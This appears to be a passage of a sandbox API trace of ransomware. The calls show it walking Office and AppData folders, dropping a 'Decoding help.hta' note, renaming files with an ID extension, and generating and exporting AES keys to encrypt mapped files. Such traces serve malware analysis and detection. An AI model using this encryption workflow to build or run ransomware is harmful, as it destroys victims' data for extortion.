lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0055.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0055.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" [0055.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Decoding help.hta" (normalized: "c:\\program files\\microsoft office\\document themes 14\\decoding help.hta")) returned 0x1 [0055.290] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Austin.thmx") returned 1 [0055.290] lstrlenW (lpString="Austin.thmx") returned 11 [0055.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*" [0055.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\*.*") returned 60 [0055.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\", lpString2="Austin.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" [0055.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" [0055.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.[ID]g9uZrLhJaygpwRm1[ID]" [0055.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.487] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Austin.thmx.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft office\\document themes 14\\austin.thmx.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xba8 [0060.487] CreateFileMappingA (hFile=0xba8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb9c [0060.487] CryptAcquireContextA (in: phProv=0x544fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x544fcec*=0x10e284e8) returned 1 [0060.488] CryptGenKey (in: hProv=0x10e284e8, Algid=0x6610, dwFlags=0x1, phKey=0x544fce8 | out: phKey=0x544fce8*=0x10bc5a10) returned 1 [0060.488] CryptExportKey (in: hKey=0x10bc5a10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x544fbe4, pdwDataLen=0x544fce4 | out: pbData=0x544fbe4*, pdwDataLen=0x544fce4*=0x2c) returned 1 [0060.488] MapViewOfFile (hFileMappingObject=0xb9c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17620) Thread: id = 150 os_tid = 0x6bc [0040.230] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*", lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0040.230] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.230] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.230] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.231] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.231] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb264df80, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb264df80, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0040.231] lstrcmpW (lpString1=".", lpString2="Local") returned -1 [0040.231] lstrcmpW (lpString1="..", lpString2="Local") returned -1 [0040.231] lstrcmpiW (lpString1="windows", lpString2="Local") returned 1 [0040.231] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0040.231] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned 45 [0040.231] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Local" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0040.231] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\*.*" [0040.231] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0040.231] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9581ae0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x248 [0040.232] CloseHandle (hObject=0x248) returned 1 [0040.232] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0040.232] lstrcmpW (lpString1=".", lpString2="LocalLow") returned -1 [0040.232] lstrcmpW (lpString1="..", lpString2="LocalLow") returned -1 [0040.232] lstrcmpiW (lpString1="windows", lpString2="LocalLow") returned 1 [0040.232] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0040.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned 45 [0040.232] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="LocalLow" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow" [0040.232] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*" [0040.232] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0040.232] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9599b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x248 [0040.233] CloseHandle (hObject=0x248) returned 1 [0040.233] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1014db90, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1014db90, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0040.233] lstrcmpW (lpString1=".", lpString2="Roaming") returned -1 [0040.233] lstrcmpW (lpString1="..", lpString2="Roaming") returned -1 [0040.233] lstrcmpiW (lpString1="windows", lpString2="Roaming") returned 1 [0040.235] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*" [0040.235] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\*.*") returned 45 [0040.235] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\", lpString2="Roaming" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0040.235] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0040.235] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0040.235] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d0ea18, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x248 [0040.236] CloseHandle (hObject=0x248) returned 1 [0040.236] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1014db90, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1014db90, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0040.236] FindClose (in: hFindFile=0x5a5630 | out: hFindFile=0x5a5630) returned 1 Thread: id = 151 os_tid = 0x8f0 [0040.237] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*", lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7d90 [0041.909] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.909] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeef015d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.909] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.909] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.909] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbd6dc020, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbd6dc020, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10", cAlternateFileName="")) returned 1 [0041.909] lstrcmpW (lpString1=".", lpString2="CAGCAT10") returned -1 [0041.909] lstrcmpW (lpString1="..", lpString2="CAGCAT10") returned -1 [0041.909] lstrcmpiW (lpString1="windows", lpString2="CAGCAT10") returned 1 [0041.909] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*" [0041.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*") returned 47 [0041.909] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\", lpString2="CAGCAT10" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" [0041.909] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\*.*" [0041.909] GlobalMemoryStatus (in: lpBuffer=0xc90fd10 | out: lpBuffer=0xc90fd10) [0041.910] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41a83f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0041.910] CloseHandle (hObject=0x49c) returned 1 [0041.910] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 1 [0041.910] lstrcmpW (lpString1=".", lpString2="OFFICE14") returned -1 [0041.910] lstrcmpW (lpString1="..", lpString2="OFFICE14") returned -1 [0041.910] lstrcmpiW (lpString1="windows", lpString2="OFFICE14") returned 1 [0041.913] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*" [0041.913] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\*.*") returned 47 [0041.913] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\", lpString2="OFFICE14" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14" [0041.913] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\*.*" [0041.913] GlobalMemoryStatus (in: lpBuffer=0xc90fd10 | out: lpBuffer=0xc90fd10) [0041.913] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1143cf80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0041.914] CloseHandle (hObject=0x49c) returned 1 [0041.914] FindNextFileW (in: hFindFile=0x5d7d90, lpFindFileData=0xc90fd30 | out: lpFindFileData=0xc90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeef015d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x596c1850, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OFFICE14", cAlternateFileName="")) returned 0 [0041.914] FindClose (in: hFindFile=0x5d7d90 | out: hFindFile=0x5d7d90) returned 1 Thread: id = 152 os_tid = 0x8f4 [0040.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\*.*", lpFindFileData=0x3bcfd30 | out: lpFindFileData=0x3bcfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 153 os_tid = 0x5f4 [0040.239] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*", lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0040.239] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.239] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe5db9aa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe5db9aa0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.931] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.931] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.931] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdf0acac0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf0acac0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0041.931] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0041.931] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0041.931] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0041.932] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0041.932] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0041.932] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033" [0041.932] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1033\\*.*" [0041.932] GlobalMemoryStatus (in: lpBuffer=0xca4fd10 | out: lpBuffer=0xca4fd10) [0041.932] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9611d50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x498 [0041.932] CloseHandle (hObject=0x498) returned 1 [0041.932] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x779e270, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x779e270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x779e270, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1036", cAlternateFileName="")) returned 1 [0041.933] lstrcmpW (lpString1=".", lpString2="1036") returned -1 [0041.933] lstrcmpW (lpString1="..", lpString2="1036") returned -1 [0041.933] lstrcmpiW (lpString1="windows", lpString2="1036") returned 1 [0041.935] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0041.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0041.935] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="1036" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036" [0041.935] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\1036\\*.*" [0041.935] GlobalMemoryStatus (in: lpBuffer=0xca4fd10 | out: lpBuffer=0xca4fd10) [0041.935] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11454fe8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x498 [0041.936] CloseHandle (hObject=0x498) returned 1 [0041.936] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xca4fd30 | out: lpFindFileData=0xca4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a4f390, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5a4f390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a4f390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3082", cAlternateFileName="")) returned 1 [0041.936] lstrcmpW (lpString1=".", lpString2="3082") returned -1 [0041.936] lstrcmpW (lpString1="..", lpString2="3082") returned -1 [0041.936] lstrcmpiW (lpString1="windows", lpString2="3082") returned 1 [0041.938] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*" [0041.938] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\*.*") returned 50 [0041.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\", lpString2="3082" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082" [0041.938] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\3082\\*.*" [0041.938] GlobalMemoryStatus (in: lpBuffer=0xca4fd10 | out: lpBuffer=0xca4fd10) [0041.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1146d050, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x498 [0041.940] CloseHandle (hObject=0x498) returned 1 [0041.940] 